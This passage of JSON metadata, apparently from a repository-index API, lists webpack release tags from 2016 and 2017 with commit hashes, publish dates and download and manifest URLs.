45a271fb05b14b0e9829686149","kind":"tag","published_at":"2017-10-11T19:39:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"551ea76838f163a1e0fbf65182e2ac08d346a1f3","kind":"tag","published_at":"2017-10-11T18:07:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0/manifests"},{"name":"v3.6.0","sha":"622675993d72c6ea7d70cd2e503fd9416f940b2b","kind":"tag","published_at":"2017-09-15T08:45:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0/manifests"},{"name":"v3.5.6","sha":"92d5c209437f9ef9293571e24cc8dcf10459d578","kind":"tag","published_at":"2017-09-06T15:41:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.6","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6/manifests"},{"name":"v3.5.5","sha":"ef6ab6820a74db730cfec6fd419d2c211d62c0bd","kind":"tag","published_at":"2017-08-16T14:55:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.5","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5/manifests"},{"name":"v3.5.4","sha":"990563f9a2b3fb3e817b7e1b9d6841bcd1eaa51e","kind":"tag","published_at":"2017-08-12T09:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.4","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4/manifests"},{"name":"v3.5.3","sha":"4b2b1ad99b86458983714c589c6495772b1292ee","kind":"tag","published_at":"2017-08-10T13:38:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"25302e51a601b4e30a661d788471e4a50b7a9764","kind":"tag","published_at":"2017-08-09T10:51:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"5be959311a746b976a0a56625cc4372307b351ed","kind":"tag","published_at":"2017-08-08T11:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"75a8ffec0a8ab2f1f07a950ee965a31917af5fe9","kind":"tag","published_at":"2017-08-08T08:50:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0/manifests"},{"name":"v3.4.1","sha":"1f064bc84f222305afada087f9631fd7ae39ea30","kind":"tag","published_at":"2017-07-26T08:48:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"c8732c8d157ed56542d521a557dda7ff7ad12ffb","kind":"tag","published_at":"2017-07-25T14:27:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0/manifests"},{"name":"v3.3.0","sha":"5b119e7c5b437fd48e7e681996b9be10cbd6de34","kind":"tag","published_at":"2017-07-15T13:52:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0/manifests"},{"name":"v2.7.0","sha":"eeea490e8ec0e2341cd4bb6da82aabf6ca139322","kind":"tag","published_at":"2017-07-12T07:00:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0/manifests"},{"name":"v3.2.0","sha":"d0059901266e54a22309c419cad6d9327767c5a3","kind":"tag","published_at":"2017-07-11T20:09:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0/manifests"},{"name":"v3.1.0","sha":"4bb3018da4310deaeff52b8a1c2b5645282b9994","kind":"tag","published_at":"2017-07-06T21:57:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"bf4ec9c26e8f6de76c3d3ec1371f3ca1c8999ca5","kind":"tag","published_at":"2017-06-19T15:37:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.2","sha":"2ba04991056475509a4e45599a1f42e91cce6233","kind":"tag","published_at":"2017-06-14T21:46:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"2e8b77ddcf66867b208dffce97fb94a87be48369","kind":"tag","published_at":"2017-06-07T11:33:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1/manifests"},{"name":"v3.0.0-rc.0","sha":"3d653290fafe385277b48e5a36807124618b9561","kind":"tag","published_at":"2017-06-05T14:12:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0/manifests"},{"name":"v2.6.1","sha":"7cfd2c490ea96c9676e8de54f2e7b6d1214722da","kind":"tag","published_at":"2017-05-25T11:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"af05c147f24d3e7ee62e0c4102bb32c55e73b8d7","kind":"tag","published_at":"2017-05-22T20:38:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"ad2f68f1f21602750ad891ea89a926806acbc95f","kind":"tag","published_at":"2017-05-06T20:07:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"bf3652b16b65c27db5243aa0d674e2de4a8ccde9","kind":"tag","published_at":"2017-05-04T10:17:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0/manifests"},{"name":"v2.4.1","sha":"bd753567da1248624beaaea14af31d6dbe303411","kind":"tag","published_at":"2017-04-14T13:34:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"0cbd8fd1a05ee401b5feb95ba2b8edae31571d94","kind":"tag","published_at":"2017-04-14T11:42:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0/manifests"},{"name":"v1.15.0","sha":"d4878a55be7a4b7ac4e5db1ae5eef89e15811072","kind":"tag","published_at":"2017-04-13T10:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0/manifests"},{"name":"v2.3.3","sha":"ba24c1b163dc038ed738eb4a57dcb241bf63146d","kind":"tag","published_at":"2017-04-03T07:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"6b209b13d76ec43080d6afbad4bb4dd6931e4638","kind":"tag","published_at":"2017-03-25T00:02:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"4b9b660e8c4fe8ab6425014cb24dcec2d5df194b","kind":"tag","published_at":"2017-03-22T14:40:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"46dc08e6317170a56df6c34adc8133dd6f70f1fa","kind":"tag","published_at":"2017-03-21T22:43:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0/manifests"},{"name":"v2.2.1","sha":"0445b156d2c958536b72036e68ca6bde0ad32055","kind":"tag","published_at":"2017-01-30T21:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"4be093d27942c25ec802a40268ed94e24d886b1d","kind":"tag","published_at":"2017-01-17T19:14:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0/manifests"},{"name":"v2.2.0-rc.8","sha":"227846990cbc1a406bb61c5e6cafb3f3f38c8cdd","kind":"tag","published_at":"2017-01-17T18:46:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8/manifests"},{"name":"v2.2.0-rc.7","sha":"0b476022bbbddb206432e20b9c8bc5e91e592202","kind":"tag","published_at":"2017-01-16T15:01:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7/manifests"},{"name":"v2.2.0-rc.6","sha":"97966969b0c9e8425ecb1238deea979c6a18cb27","kind":"tag","published_at":"2017-01-16T02:48:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6/manifests"},{"name":"v2.2.0-rc.5","sha":"437dce4c8684f4295b5bb68a6ea5662c2660d780","kind":"tag","published_at":"2017-01-15T16:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5/manifests"},{"name":"v2.2.0-rc.4","sha":"f745f02910cb45a55ed659ebd99288e45a38e873","kind":"tag","published_at":"2017-01-11T15:42:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4/manifests"},{"name":"v2.2.0-rc.3","sha":"92a8be23614f92bc5669bf43eb0ddf746b2477e7","kind":"tag","published_at":"2016-12-28T15:03:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3/manifests"},{"name":"v2.2.0-rc.2","sha":"8369cc4c03767d7a76d1f7a047d11e71a550ddae","kind":"tag","published_at":"2016-12-22T10:51:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2/manifests"},{"name":"v2.2.0-rc.1","sha":"27e604e23100274a8887a5acf0008376d2617071","kind":"tag","published_at":"2016-12-17T08:09:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1/manifests"},{"name":"v2.2.0-rc.0","sha":"057814be1930cc4e8cee22c271823ea821ad067f","kind":"tag","published_at":"2016-12-14T21:32:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0/manifests"},{"name":"v2.1.0-beta.28","sha":"2e2eac70ab1ba648ef663b9b93fdedd7928672c4","kind":"tag","published_at":"2016-12-13T07:58:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28/manifests"},{"name":"v1.14.0","sha":"e666686d9029753c243db5880de44aba57151d76","kind":"tag","published_at":"2016-12-07T08:06:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0/manifests"},{"name":"v2.1.0-beta.27","sha":"adaca2578cc3dcffbb2d0b639cb611a53f6da7c9","kind":"tag","published_at":"2016-11-15T19:00:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27/manifests"},{"name":"v2.1.0-beta.26","sha":"afbdff48ef2d5b304a41e72f4df8d51d629bc96f","kind":"tag","published_at":"2016-11-14T00:07:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26/manifests"},{"name":"v1.13.3","sha":"1a5fd7e8caeef794f67e56d9d734998209b